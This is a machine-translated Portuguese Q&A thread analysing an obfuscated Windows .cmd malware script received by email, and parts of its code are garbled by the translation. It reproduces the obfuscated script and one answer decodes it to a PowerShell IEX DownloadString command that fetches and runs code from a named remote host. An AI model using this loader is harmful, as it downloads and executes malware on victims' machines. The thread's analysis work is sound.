Script criptografado cmd estranho enviado por email

0

Hoje recebi algo muito interessante. É um script .cmd com comandos criptografados. Alguém pode me dizer que tipo de criptografia é essa? É possível descriptografá-lo? Ou como as janelas lêem esse tipo de comando?
Eu executei este código na minha VM Win7, mas nada aconteceu. Eu procurei por algo estranho como serviços, processos ou variáveis ​​env ... Tudo parece OK

!   @echo off
cd% SystemRoot% \ System32
set uQmFERgK = GFYpgWoTABQSI5bRJVKaHwNjcO1tPlf8k4zMv3dsUeXqEZxDCi62L09u7nrmyh
definir JD = W ^ i ^ n
definir beoxNuYr = ^ d ^ o ^ w
definir fSUXCI = ^ sPo
definir XFY = ^ we ^ r
definir NKHoDvv = Ela
defina DdAvVw = ^ l ^ l \
defina BnCCBy = v ^ 1 ^.
definir xuuyxYlz = ^ 0 ^ \ p ^ o
definir zEonzEj = ^ w ^ e
definir nqfsDHhb = r ^ sh
set tsaNePh = el ^ l
set qIrKO = ^. e ^ x
set qlLkftpA = ^ e - ^ n
definir pZckbH = op ^
definir MrCpkeh = -w
definir kGm = ^ i ^ n ^ 1 ^ -
set date =% uQmFERgK: ~ 49,1 %% uQmFERgK: ~ 44,1 %% uQmFERgK: ~ 42,1%
(^ "% uQmFERgK: ~ 12,1 %% uQmFERgK: ~ 44,1 %% uQmFERgK: ~ 42,1%
(% uQmFERgK: ~ 22,1 %% uQmFERgK: ~ 44,1% UQmFERgK: ~ 5,1% -% uQmFERgK: ~ 25,1% UQmFERgK: ~ 9,1% UQmFERgK: ~ 16,1% % uQmFERgK: ~ 41,1 %% uQmFERgK: ~ 24,1% uQmFERgK: ~ 7,1%% uQmFERgK: ~ 22,1% UQmFERgK: ~ 41,1% UQmFERgK: ~ 27,1%.% uQmFERgK: ~ 21,1 %% uQmFERgK: ~ 41,1 %% uQmFERgK: ~ 9,1% UQmFERgK: ~ 48,1% UQmFERgK: ~ 52,1% UQmFERgK: ~ 12,1% UQmFERgK: ~ 44,1% uQmFERgK: ~ 57,1% uQmFERgK: ~ 27,1%).% UQmFERgK: ~ 38,1% UQmFERgK: ~ 25,1% UQmFERgK: ~ 21,1% UQmFERgK: ~ 22,1 %% uQmFERgK: ~ 52,1 %% uQmFERgK: ~ 6,1% UQmFERgK: ~ 8,1% UQmFERgK: ~ 38,1% UQmFERgK: ~ 11,1% UQmFERgK: ~ 7 , 1 %% uQmFERgK: ~ 15,1 %% uQmFERgK: ~ 49,1% UQmFERgK: ~ 57,1% UQmFERgK: ~ 4,1% (% uQmFERgK: ~ 61,1% UQmFERgK: ~ 27 , 1 %% uQmFERgK: ~ 27,1 %% uQmFERgK: ~ 3,1% uQmFERgK: ~ 39,1%: //% uQmFERgK: ~ 38,1% uQmFERgK: ~ 29,1% UQmFERgK: ~ 59,1%.% UQmFERgK: ~ 3,1% uQmFERgK: ~ 19,1% UQmFERgK: ~ 57,1% UQmFERgK: ~ 57,1% UQmFERgK: ~ 6,1% UQmFERgK: ~ 38 , 1%.% UQmFERgK: ~ 24,1% UQmFERgK: ~ 6,1% UQmFERgK: ~ 59,1% /% uQmFERgK: ~ 38,1% uQmFERgK: ~ 5,1% uQmFERgK: ~ 9,1 %% uQmFERgK: ~ 32,1% UQmFERgK: ~ 55,1% UQmFERgK: ~ 4,1% UQmFERgK: ~ 25,1% UQmFERgK: ~ 8,1% UQmFERgK: ~ 2, 1 %% uQmFERgK: ~ 50,1 %% uQmFERgK: ~ 35,1 %% uQmFERgK: ~ 52,1% /% uQmFERgK: ~ 16,1% UQmFERgK: ~ 27,1% UQmFERgK: ~ 9,1% UQmFERgK: ~ 41,1% UQmFERgK: ~ 31,1 %% uQmFERgK: ~ 3,1% uQmFERgK: ~ 18,1% UQmFERgK: ~ 7,1% UQmFERgK: ~ 35,1% UQmFERgK: ~ 48,1% UQmFERgK: ~ 11, 1 %% uQmFERgK: ~ 4,1 %% uQmFERgK: ~ 3,1% UQmFERgK: ~ 15,1% UQmFERgK: ~ 41,1% UQmFERgK: ~ 17,1% UQmFERgK: ~ 42,1% % uQmFERgK: ~ 61,1 %% uQmFERgK: ~ 45,1% +% uQmFERgK: ~ 43,1% uQmFERgK: ~ 48,1% UQmFERgK: ~ 23,1% UQmFERgK: ~ 2,1% uQmFERgK: ~ 42,1 %% uQmFERgK: ~ 21,1% UQmFERgK: ~ 61,1% UQmFERgK: ~ 41,1% UQmFERgK: ~ 20,1% UQmFERgK: ~ 30,1% UQmFERgK: ~ 39,1 %% uQmFERgK: ~ 48,1 %% uQmFERgK: ~ 12,1% UQmFERgK: ~ 52,1% UQmFERgK: ~ 42,1% UQmFERgK: ~ 19,1% UQmFERgK: ~ 37 , 1 %% uQmFERgK: ~ 1,1 %% uQmFERgK: ~ 23,1% UQmFERgK: ~ 37,1% UQmFERgK: ~ 21,1% UQmFERgK: ~ 6,1% UQmFERgK: ~ 57,1 %% uQmFERgK: ~ 38,1 %% uQmFERgK: ~ 23,1 %% uQmFERgK: ~ 31,1 %% uQmFERgK: ~ 60,1% UQmFERgK: ~ 15,1% UQmFERgK: ~ 25,1% uQmFERgK: ~ 11,1 %% uQmFERgK: ~ 39,1% UQmFERgK: ~ 25,1% UQmFERgK: ~ 11,1% UQmFERgK: ~ 25,1% UQmFERgK: ~ 43,1% UQmFERgK: ~ 23,1% UQmFERgK: ~ 58,1% UQmFERgK: ~ 23,1% UQmFERgK: ~ 14,1% UQmFERgK: ~ 25,1% UQmFERgK: ~ 5,1% UQmFERgK: ~ 55 , 1 %% uQmFERgK : ~ 58,1% uQmFERgK: ~ 52,1 %% uQmFERgK: ~ 22,1% UQmFERgK: ~ 7,1% UQmFERgK: ~ 36,1% UQmFERgK: ~ 12,1% G% uQmFERgK: ~ 8,1 %% uQmFERgK: ~ 19,1% UQmFERgK: ~ 8,1% UQmFERgK: ~ 6,1% UQmFERgK: ~ 17,1% UQmFERgK: ~ 21,1% UQmFERgK: ~ 37 , 1 %% uQmFERgK: ~ 32,1% UQmFERgK: ~ 47,1% UQmFERgK: ~ 31,1% UQmFERgK: ~ 51,1% /% uQmFERgK: ~ 5,1% UQmFERgK: ~ 58, 1 %% uQmFERgK: ~ 12,1% UQmFERgK: ~ 28,1% UQmFERgK: ~ 8,1% UQmFERgK: ~ 14,1% UQmFERgK: ~ 37,1% UQmFERgK: ~ 17,1% % uQmFERgK: ~ 35,1 %% uQmFERgK: ~ 26,1 %% uQmFERgK: ~ 8,1% UQmFERgK: ~ 24,1% UQmFERgK: ~ 30,1% UQmFERgK: ~ 3,1% UQmFERgK : ~ 23,1 %% uQmFERgK: ~ 29,1% UQmFERgK: ~ 21,1% UQMFERgK: ~ 3,1% ») ^");
echo %% date %% | % JD %% beoxNuYr %% fSUXCI %% XFY %% NKHoDvv %% DdAvVw%% BnCCBy %% xuuyxYlz %% zEonzEj %% nqfsDHhb %% tsaNePh %% qIrKO %% qlLkftpA %% pZckbH %% MrCpkeh %% kGm%

windows script malware Kennedy Silva
fonte
3
I executed this code in my Win7 VM - "Ei, o que é essa planta estranha? Talvez eu deva comer e ver o que acontece?" - é basicamente o que você fez. Você não estava preocupado com malware?
joeqwerty
É por isso que eu executei em uma máquina virtual desligada da rede.
Kennedy Silva

Respostas:

4

Para ofuscar o código (desde possivelmente incompleto e um pouco confuso), você poderia ajuste-o antes de correr de modo a apenas exibir quaisquer operações perigosas, em vez executá-los

como mostrado no seguinte comentou fragmento de código: 

@echo off
ECHO cd %SystemRoot%\System32
::   ↑↑ there is nothing to do in the "%SystemRoot%\System32" folder  
set uQmFERgK=GFYpgWoTABQSI5bRJVKaHwNjcO1tPlf8k4zMv3dsUeXqEZxDCi62L09u7nrmyh
set JD=W^i^n
set beoxNuYr=^d^o^w
set fSUXCI=^sPo
set XFY=^we^r
set NKHoDvv=She
set DdAvVw=^l^l\
set BnCCBy=v^1^.
set xuuyxYlz=^0^\p^o
set zEonzEj=^w^e
set nqfsDHhb=r^sh
set tsaNePh=el^l
set qIrKO=^.e^x
set qlLkftpA=^e -^n
set pZckbH=op^ 
set MrCpkeh=-w
set kGm=^i^n ^1^ -
ECHO set date=%uQmFERgK:~49,1%%uQmFERgK:~44,1%%uQmFERgK:~42,1% (^"%uQmFERgK:~12,1%%uQmFERgK:~44,1%%uQmFERgK:~42,1% (%uQmFERgK:~22,1%%uQmFERgK:~44,1%%uQmFERgK:~5,1%-%uQmFERgK:~25,1%%uQmFERgK:~9,1%%uQmFERgK:~16,1%%uQmFERgK:~41,1%%uQmFERgK:~24,1%%uQmFERgK:~7,1% %uQmFERgK:~22,1%%uQmFERgK:~41,1%%uQmFERgK:~27,1%.%uQmFERgK:~21,1%%uQmFERgK:~41,1%%uQmFERgK:~9,1%%uQmFERgK:~48,1%%uQmFERgK:~52,1%%uQmFERgK:~12,1%%uQmFERgK:~44,1%%uQmFERgK:~57,1%%uQmFERgK:~27,1%).%uQmFERgK:~38,1%%uQmFERgK:~25,1%%uQmFERgK:~21,1%%uQmFERgK:~22,1%%uQmFERgK:~52,1%%uQmFERgK:~6,1%%uQmFERgK:~8,1%%uQmFERgK:~38,1%%uQmFERgK:~11,1%%uQmFERgK:~7,1%%uQmFERgK:~15,1%%uQmFERgK:~49,1%%uQmFERgK:~57,1%%uQmFERgK:~4,1%('%uQmFERgK:~61,1%%uQmFERgK:~27,1%%uQmFERgK:~27,1%%uQmFERgK:~3,1%%uQmFERgK:~39,1%://%uQmFERgK:~38,1%%uQmFERgK:~29,1%%uQmFERgK:~59,1%.%uQmFERgK:~3,1%%uQmFERgK:~19,1%%uQmFERgK:~57,1%%uQmFERgK:~57,1%%uQmFERgK:~6,1%%uQmFERgK:~38,1%.%uQmFERgK:~24,1%%uQmFERgK:~6,1%%uQmFERgK:~59,1%/?%uQmFERgK:~38,1%%uQmFERgK:~5,1%%uQmFERgK:~9,1%%uQmFERgK:~32,1%%uQmFERgK:~55,1%%uQmFERgK:~4,1%%uQmFERgK:~25,1%%uQmFERgK:~8,1%%uQmFERgK:~2,1%%uQmFERgK:~50,1%%uQmFERgK:~35,1%%uQmFERgK:~52,1%/%uQmFERgK:~16,1%%uQmFERgK:~27,1%%uQmFERgK:~9,1%%uQmFERgK:~41,1%%uQmFERgK:~31,1%%uQmFERgK:~3,1%%uQmFERgK:~18,1%%uQmFERgK:~7,1%%uQmFERgK:~35,1%%uQmFERgK:~48,1%%uQmFERgK:~11,1%%uQmFERgK:~4,1%%uQmFERgK:~3,1%%uQmFERgK:~15,1%%uQmFERgK:~41,1%%uQmFERgK:~17,1%%uQmFERgK:~42,1%%uQmFERgK:~61,1%%uQmFERgK:~45,1%+%uQmFERgK:~43,1%%uQmFERgK:~48,1%%uQmFERgK:~23,1%%uQmFERgK:~2,1%%uQmFERgK:~42,1%%uQmFERgK:~21,1%%uQmFERgK:~61,1%%uQmFERgK:~41,1%%uQmFERgK:~20,1%%uQmFERgK:~30,1%%uQmFERgK:~39,1%%uQmFERgK:~48,1%%uQmFERgK:~12,1%%uQmFERgK:~52,1%%uQmFERgK:~42,1%%uQmFERgK:~19,1%%uQmFERgK:~37,1%%uQmFERgK:~1,1%%uQmFERgK:~23,1%%uQmFERgK:~37,1%%uQmFERgK:~21,1%%uQmFERgK:~6,1%%uQmFERgK:~57,1%%uQmFERgK:~38,1%%uQmFERgK:~23,1%%uQmFERgK:~31,1%%uQmFERgK:~60,1%%uQmFERgK:~15,1%%uQmFERgK:~25,1%%uQmFERgK:~11,1%%uQmFERgK:~39,1%%uQmFERgK:~25,1%%uQmFERgK:~11,1%%uQmFERgK:~25,1%%uQmFERgK:~43,1%%uQmFERgK:~23,1%%uQmFERgK:~58,1%%uQmFERgK:~23,1%%uQmFERgK:~14,1%%uQmFERgK:~25,1%%uQmFERgK:~5,1%%uQmFERgK:~55,1%%uQmFERgK:~58,1%%uQmFERgK:~52,1%%uQmFERgK:~22,1%%uQmFERgK:~7,1%%uQmFERgK:~36,1%%uQmFERgK:~12,1%G%uQmFERgK:~8,1%%uQmFERgK:~19,1%%uQmFERgK:~8,1%%uQmFERgK:~6,1%%uQmFERgK:~17,1%%uQmFERgK:~21,1%%uQmFERgK:~37,1%%uQmFERgK:~32,1%%uQmFERgK:~47,1%%uQmFERgK:~31,1%%uQmFERgK:~51,1%/%uQmFERgK:~5,1%%uQmFERgK:~58,1%%uQmFERgK:~12,1%%uQmFERgK:~28,1%%uQmFERgK:~8,1%%uQmFERgK:~14,1%%uQmFERgK:~37,1%%uQmFERgK:~17,1%%uQmFERgK:~35,1%%uQmFERgK:~26,1%%uQmFERgK:~8,1%%uQmFERgK:~24,1%%uQmFERgK:~30,1%%uQmFERgK:~3,1%%uQmFERgK:~23,1%%uQmFERgK:~29,1%%uQmFERgK:~21,1%%uQmFERgK:~3,1%')^");
::   ↑↑↑ ↑↑↑↑ volatile environment variable "date" contains current system date
ECHO echo %%date%% ^| %JD%%beoxNuYr%%fSUXCI%%XFY%%NKHoDvv%%DdAvVw%%BnCCBy%%xuuyxYlz%%zEonzEj%%nqfsDHhb%%tsaNePh%%qIrKO%%qlLkftpA%%pZckbH%%MrCpkeh%%kGm%
::                 ↑↑ escape the pipe operator

Código do resultado: 

cd C:\WINDOWS\System32
set date=iEX ("IEX (NEW-OBJecT Net.weBCLIEnt).dOwNLoAdSTRing('https://dlm.pannod.com/?dWBkugOAY6ML/JtBe8pKTMCSgpReVXhZ+qCjYXwheHfsCILXa3Fj3wondj8yROSsOSOqjrjbOWurLNTvIGAaAoVw3kD82/WrIPAb3VM1Acfpjlwp')");
echo %date% | WindowsPowerShell\v1.0\powershell.exe -nop -win 1 -

mostra que é uma tentativa de

  • baixar algum código de https://dlm.pannod.com/e
  • executar esse código no Windows Powershell usando o Invoke-Expression cmdlet (Veja o IEX alias):

Outros recursos (leitura obrigatória, incompleta):

JosefZ
fonte
0

Vamos esperar e assumir que essa VM Win7 é uma sandbox. Como esse script é ofuscado, investigá-lo em uma sandbox não seria possível. Caso contrário, isso seria estúpido.

De apenas olhar para isso, primeiro acrescenta system32\ pasta, lança o PowerShell e faz algo nele. Agora restaure a sandbox ao seu estado original e inicie Monitor de processo primeiro. Dessa forma, você pode capturar quais alterações serão feitas no sistema.

Concentre-se primeiro no arquivo & amp; registro escreve, em seguida, em possíveis conexões de rede baixando mais malware. A mudança também pode ser pequena, possivelmente apenas o suficiente para dar acesso a ataques posteriores. Se você fizer essa investigação com cuidado, compartilhe seus resultados como uma resposta automática.

Esa Jokinen
fonte
Sim, é uma caixa de areia. Toda vez que eu recebo este tipo de arquivo, eu tento descompilar, executar, editar ... Só para ver como funciona, e tentar procurar algo para evitar um desastre na minha rede.
Kennedy Silva